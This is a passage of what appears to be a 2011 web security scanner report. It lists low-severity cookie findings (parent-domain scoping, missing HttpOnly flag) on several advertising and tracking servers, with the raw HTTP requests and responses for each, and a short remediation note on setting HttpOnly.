Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101KjjLzXU9Wj/OQG=; bko=KJ0qh1q9XWFf3YXwyhNKOGSuZGmIE903zJRLcyweM5Dc4JDRJvWLxRRyxxRssd82FGy1BAYVvjMkpx+C1EWAxk71eaP9cuKUf9evsg1p1myeLyeSHO72; bkw5=KJhgDsHQRmY3jK9YDA/1XHG1e/y17aycoM1yLsACj/xjcrAMjwbOjuGj4QWoPGRWBTE1akt/eWQwaX1N/TE1vuxjqGSdue/KCiYjSGRExW3xTqRoxZRqAmlsVzkyQH6AjZzJ/Mw8ozDjsax+sOizmvLjNJQRsaQRXgN91+mRwyOPXaQOMVs9Z1ReRQJkdFw/Je90SYnJz1akoBxjsqEO1iPQsDSGeY4F5OBsO76AsuRDZDvxeB9aUhCORHOrMlYOk0lYcZTDKtfq/DhMHMcBeS0dsi3sg1z5namY/LwsVpmUASc5QRWCESvS/xDL2L/OTGv7xOKQ0ghWAMayQLxY09VzespminYm9zRi9tXkyy+ZAWdUr6cYZ3ZuQVWFAQypyt/AZVXK0vS5X6YRJr9BX7y5mJhasajT/Vx90ZoUfQ==; bkst=KJh5DeNny69RF3WQtBxvMAJhzeHy7Id5QRmNh3oxuGNtPcgCLCESGuxHjl2OzU/UHHxUxx5HacPtXEzTrni8KGknXSSc8Tw7KSIWf3KHK057eb6uK7HTYiVedZYRePS0a6z2mVGHHzxuCG7NVRdWwG2b6+5vRMXsOAqWOar9HraddF1puyPyb6+kM12Mvl0eY4MSs3rLyCyysl2Km4dfjvVG8irIcEVcZ1x9ZM/rOHa19OBbpf+pzgDXAPQrW3N0AKOWvX3OuLGauWJOgHE0DEAdzUqoNKaMChKxf7xmGottueqGjAIr277SesZG/R7qpPsTNFiolEMF34wmG6R2Y/BV+TmeJBLm+rxGtx5EE64HIgO4evoTKUFK0CHQGiZP036QSFhNbKHSOuWwjVNgLFGCl6tf3UKKgd3G8WLAQeYYY60GI6S1MRTM9LoyGb1R/FNtKItXapwdqFTan/CFAy==; bk=iklbKCA+ZqtVIHOf; bkc=KJh56XXgHaWDOdeFBz1Rw8ojAW/DR6CuJCxt43yL7G6SaCquqmpkP2x/iHDNDzgSM0AVLfaQ1r/dLaOv4LjYLuaV7wmTlM+lXHS4mr4zzIX8q0W4IchxYeSzVyg99F7JJ2Nc72+eUL4OwsOQeKizmnmXXcMRDzmIHKZZ/ZZro86C88XYwVurpTbmulmXBrzwdolcMCz9ajDvlHXjvhL5+ZmpWmjXfPBvmiQann/cdDctFZsmNNfl9Bw+yBC1hMbwd5RZdVCTgPPbNEeUNdbZd7GEYo4JAlIUe6+lBD3UNAG4CbDFxAqI1GE84m6PZrXqpEdh73qfa++IBzphtgkITJgZs6rZfUptlnC6lee7S6zYywtBx7EwXSNCM+5m6ghEvSOrhlccGMEcSNzD67fDvOuTdOvs115gcNsIkdjFz2FhDoD6htrwD7I42yG+QEE+gf/5FomrBkhwIICtNoH6l3E6XTC6VRA62bB+6U0IF935Q5dItJWsYBFdt8d25wIBjGUDfrsdg6wuFY2rzf8te7kdu0coXGpCHnBMwfl40xSWRdwuUUaoKbbrKkzCVjdfz8Ff6dTOjAe2+x==

Response

HTTP/1.0 200 OK
Date: Mon, 09 May 2011 14:00:04 GMT
Set-Cookie: bklc=4dc7f364; expires=Wed, 11-May-2011 14:00:04 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 10 May 2011 14:00:04 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=c6b/zCA+ZqtVIHOf; expires=Sat, 05-Nov-2011 14:00:04 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56XLgHcWDOdeFpTpcKeup//DGhoYAEYCLwaRVN6RBYy+oBFq0S+u/uS0GiPnVck1LjZwOjYqI9yrk8OAnhRjRzzfkjIf8nVqhSzfld1b28lzpYMiL9v0w+mUYAY2ewM9XbL8b3xMT4aeyBj2q2O4REd7uQdHpZFwSFAJQKOlGZEbplcY8tYceIEcoNkJof3K5JC5kQcT02tKco3u8UoFp/ld7LSwaxcVBxCX2U0bbqR47/zh8fx6U1BzaEWqu5of2Ni72Sci2xlgB1w4Ud3qpOr/vkT7E4NKBu4Ktuaz6uJXWoYdXH7Tay70I2ig+bTltsU2w6qfnqnXS87g+9Q2yE4LvJNJt7g6yJH6Npc7+GOKTFNW/fV52S8Mg+Hm6FtxuSBpBrMLZp4USNuV6fl3aR7/m5CgRnyW/zflt1KU55JIt57fpfmPSSSfU73e8wrXPtg6orGdv5rOmrL8yW26FolBZox+7oJdcouFnoUAKqRFtXIPVbwcIpLzmBAwRd7fIfvc7lthEumT5d4FSnXllhV7mSIKHefRPWQ8ce14qLFqxIpF5CcOTDqGlvZlFN5cF0idfXlhmXlpSwTTe9eW=; expires=Sat, 05-Nov-2011 14:00:04 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101Df84ByU9WiqOgR=; expires=Sat, 05-Nov-2011 14:00:04 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5Dn+v96WD7u/QZ1x/kAvyLcHC775ZyY/hgkWCCniSDLZLL66QvznrigP4WvpLHHeaH+OYa1PcSI1lVBQ/agqmgG6TNKWXmm5m95N1/FKmEZ8qOUE7X9uvOdlO1OlD6A5clE+3cGUWWGSJ2PiwHOTwK2nEuZ/F9QjsH9HqQWqr4dMN16Lazm+JjRpc/0LXQykTtC3gg1/z1Ord7pFdb22vDzkV4eo3OMsJ9EHkU9GiZ99Z2cqotLZPTodWRo8Ga41WJNoHekHunA9uY33V0y4af1EoCuKcehtKxfgEtxLlt0JKoVL2r5E7uEmQQRRTSM5cyUnMrlgoF14mmTLS5EdyV26m2rB6yNIUGlQcEe6jCuFe4MbGU1gSLNSZ9OBB3PHrOPcMMp17PXL/kPeS+iS+fdm+oJFL4g6Td3tznjW9yQQr1vcrspWtmQGJv1mBei1/24wPC4mKEFtfIx5jnl9d; expires=Sat, 05-Nov-2011 14:00:04 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 10-May-2011 14:00:04 GMT; path=/; domain=.bluekai.com
BK-Server: 3550
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
9.90. http://tap.rubiconproject.com/oz/sensor  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oz/sensor?p=rubicon&pc=8201/13264&cd=false&xt=19&k=shakin'+stevens:144,irish+times:136,n+kane:104,sufjan+stevens:104,siobh+n:104,stevens:74,irish+time:68,computer+screen:64,reflects+order:64,play+reflects:64,stevens+plays:64,war+photographer's:64,s+grid:64,photographer's+world:64,dublin+s:64,harding+s:64,grid+play:64,s+olympia:64,screen+near:64,shop+around:64,car+finance:64,plays+dublin:64,war+photographer:52,stevens+realise:40,health+problems:40,shows+can:40,shakin'+steven:40,can+expect:40,1980s+janet:40,dublin+shows:40,janet+jackson:40,recent+health:40,upcoming+dublin:40,mid+1980s:40,prince+vibe:40,made+sufjan:40,frail+gift:40,tells+siobh:40,problems+made:40,irish:38,&t=Shakin'+Stevens+-+The+Irish+Times+-+Fri,+May+06,+2011 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; xdp_ti="2 May 2011 12:48:41 GMT"; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; dq=25|7|18|0; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; rdk15=0; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; rdk=7856/12590; rdk2=0; ses2=12590^2&13549^1; csi2=3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680

Response

HTTP/1.1 204 No Content
Date: Mon, 09 May 2011 14:07:04 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Tue, 08-May-2012 14:07:04 GMT; Path=/
Set-Cookie: dq=26|7|19|0; Expires=Tue, 08-May-2012 14:07:04 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

9.91. http://trgca.opt.fimserve.com/fp.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trgca.opt.fimserve.com
Path:   /fp.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fp.gif?pixelid=287-036699&diresu=154dab7990adc1d6f3372c12 HTTP/1.1
Host: trgca.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; ssrtb=0; UI="2a8dbca1b98673a117|79973.9.-5.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; LO=00Oj63Jim1.00GK000h0W3NTAEE0; TRG=NDAuMT04NTU1JjM5LjQ9ODEyNCY=

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 43
Server: PR/1.4.0.0/0.7.61
P3P: policyref="http://www.fimserve.com/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache, no-store
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Date: Mon, 09 May 2011 14:01:09 GMT
Connection: close
Set-Cookie: TRG=NDAuMT04NTU1JjM5LjQ9ODEyNCY=; domain=.fimserve.com; path=/; expires= Wednesday, 22-Apr-2020 12:22:20 GMT

GIF89a.............!.......,...........L..;
9.92. http://va.px.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?key=segment&pixelID=57145&partner_uid=&partnerID=115 HTTP/1.1
Host: va.px.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; segments_p1="eJzjYuZojOBi4Wj6zwQkm4EkEwcHkNXZwczFzDFRBcic9JQJyJxuDGTO/AFSNQdMzv0BEl4QDGSu3c8IZG4sBjJ37GLk4uLYuY9Z4NDBZe9YgOw9QPb3FduBbBaOve9BCvf7AZkHuxmB5KEjIEOO5gCZx5+ATD0BJk+CzT6dAyTOgeQufAeJXtwLIp9cAGl8sZsZSL7cBxJ5C2a/OwBy8T8OoJV/tjEJ7H7+DGglUCAcAECUP/o="; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1="eJzjkuH4/o1ZgFHi/7P571gUGDX+H1/4jsWA0QLM55LhmH0DJPscKts+fwFYFsznEuFYeZYVKNv5vQ0oy6DBYMBgwQAUvXeAVYBJYsuFX2+RRa98ZgGqXY8m+gooyiTxbNEPFNEV80HmTu47jSK68z7ILbPmr0WIAgA1izvV"; io_freq_p1="eJzjEudY4CLAJPH/2fx3LAoMGgwGTBbPQWwuYY6rEQKMEp3f26ASDBYMQMH1rkDVWy78eosseDxQgFliPZrgtlCg9sl9p1EE97oABWfNX4sQBACAmCKB"; dp_rec="{\"1\": 1304340350+ \"3\": 1304949631+ \"2\": 1304949608+ \"5\": 1304340362+ \"4\": 1304340367}"

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 14:05:46 GMT
Set-Cookie: segments_p1="eJzjYuZYEMzFzHE0h4uF48QTJi4ujj37mAW+r9j+jgUocrCbEUhOesoEVNIYAZT8s41JYPfzZ0BJZo5zOUDiNEjjcaBGFo4duxiBAv/Cgcy970HM6cZA5pwfILl3B5iBZGcHiJz7A2TcRBUg88VuZqChO4E27rp3BGgoEwcHUGpjMVDqyQWQ1SfBut/uBum78B3EPnQERM4Eizf/B5n0jwPIbAIz9/sBmRf3guRe7gORa/czAgAW/EAt";Version=1;Path=/;Domain=invitemedia.com;Expires=Tue, 08-May-2012 14:05:46 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/pixel?id=1268638&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)

9.93. http://www.burstnet.com/enlightn/7578//12A4/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/7578//12A4/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enlightn/7578//12A4/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3qCOBQmN0yUv6WrF--lZoc3dRfuweNq9qe4Bp0O5v0HfEOi0vh6R2kg; /BC3=.P_d.; /SO=:201:; /PC=0; /SC=0-2vc.1

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Mon, 09 May 2011 14:01:03 GMT
Content-Length: 43
Connection: close
Set-Cookie: TID=16sfssv0tfhb31; path=/; expires=Sun, 07-Aug-2011 14:01:03 GMT; domain=.burstnet.com
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=16g.1Elg; path=/; expires=Wed, 09-May-2012 14:01:03 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;
10. Cookie without HttpOnly flag set  previous  next
There are 135 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

10.1. http://admatch-syndication.mochila.com/viewer/channel/badgeCSS  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://admatch-syndication.mochila.com
Path:   /viewer/channel/badgeCSS

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /viewer/channel/badgeCSS?tid=10630&buyerId=OrlandoSentinel&channelId=13429&voxBust=6 HTTP/1.1
Host: admatch-syndication.mochila.com
Proxy-Connection: keep-alive
Referer: http://admatch-syndication.mochila.com/viewer/channel/badgex?&asHtml=true&buyerId=OrlandoSentinel&destination=1596&channelId=13429&tid=10630&destination=&articleTemplateId=&badgeTemplateId=&widgetClass=&assetExcludeId=null&randomize=false&buid=1&rd=www.orlandosentinel.com&mcmp=all_ibd_tout_widget
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=368EB20CFF65A4C969A63CDAAF21D7B4

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:38 GMT
Server: VoxCAST
Set-Cookie: JSESSIONID=DEAD8A70AF3A5710CCDB866C3344188D; Path=/
Last-Modified: Mon, 09 May 2011 10:22:17 GMT
Cache-Control: max-age=18000
Content-Language: en-US
P3P: CP="CUR ADM OUR NOR STA NID"
Vary: Accept-Encoding
Age: 13041
X-Cache: HIT from VoxCAST
Content-Type: text/css;charset=UTF-8
Content-Length: 5866


           #mochila-wrapper { /* position:relative; For IE6 hasLayout */ /* float:left; IE7 breaks without this! */ width:750px; margin:0 auto; font:normal 12px Arial, sans-serif; color:#2222
...[SNIP]...
10.2. http://admatch-syndication.mochila.com/viewer/channel/badgex  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://admatch-syndication.mochila.com
Path:   /viewer/channel/badgex

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /viewer/channel/badgex?&asHtml=true&buyerId=OrlandoSentinel&destination=1596&channelId=13429&tid=10630&destination=&articleTemplateId=&badgeTemplateId=&widgetClass=&assetExcludeId=null&randomize=false&buid=1&rd=www.orlandosentinel.com&mcmp=all_ibd_tout_widget HTTP/1.1
Host: admatch-syndication.mochila.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:37 GMT
Server: VoxCAST
Set-Cookie: JSESSIONID=368EB20CFF65A4C969A63CDAAF21D7B4; Path=/
Last-Modified: Mon, 09 May 2011 13:43:01 GMT
Cache-Control: max-age=12000
Content-Language: en-US
P3P: CP="CUR ADM OUR NOR STA NID"
Vary: Accept-Encoding
Age: 997
X-Cache: HIT from VoxCAST
Content-Type: text/html;charset=UTF-8
Content-Length: 9024


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<style type="text/css" media="screen">
body{

...[SNIP]...
10.3. http://ads.adxpose.com/ads/ads.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/ads.js?uid=9ByavNwWFmRBp6h6_40792835 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N2724.Centro.com/B5245176.26;sz=728x90;ord=[timestamp]?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D132C27E1D743D7D5282F1F2C64D6A22; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:10 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
10.4. http://event.adxpose.com/event.flow  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.indianasnewscenter.com%2Fnews%2Flocal%2FAt-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html&uid=9ByavNwWFmRBp6h6_40792835&xy=0%2C0&wh=728%2C90&vchannel=382765&cid=Toyota_2011_RAAP&iad=1304949550599-23798237647861244&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N2724.Centro.com/B5245176.26;sz=728x90;ord=[timestamp]?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E6395C0819D24DF51059D75784832A19; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 106
Date: Mon, 09 May 2011 13:59:11 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("9ByavNwWFmRBp6h6_40792835");
10.5. http://s.clickability.com/s  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://s.clickability.com
Path:   /s

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s?&5=300&35=1&6=121488004&7=654194&8=http%3A%2F%2Fwww.indianasnewscenter.com%2Fnews%2Flocal%2FAt-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html&9=&10=At%20Noon%3A%20Casey%20Anthony%20Trial%20Begins%20In%20Florida%2C%20Plus%20More%20%7C%20Indiana's%20NewsCenter%3A%20News%2C%20Sports%2C%20Weather%2C%20Fort%20Wayne%20WPTA-TV%2C%20WISE-TV%2C%20CW%2C%20and%20My%20Network%20%7C%20Local&11=Mozilla%2F5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F534.24%20(KHTML%2C%20like%20Gecko)%20Chrome%2F11.0.696.65%20Safari%2F534.24&12=en-US&13=1&14=1.7&15=1&16=1920x1200&17=16&18=0.881893583573401&19=910 HTTP/1.1
Host: s.clickability.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=XSJJRwvp9uaycevK8bvSuzwT7PRE9+yX3HsherrzsbM=; ld=ssLQg212k+H3LqCSE0WF9IN1yHvGRQbEMl0oM8dwNE28YQc4QkM99dx7IXq687Gz

Response

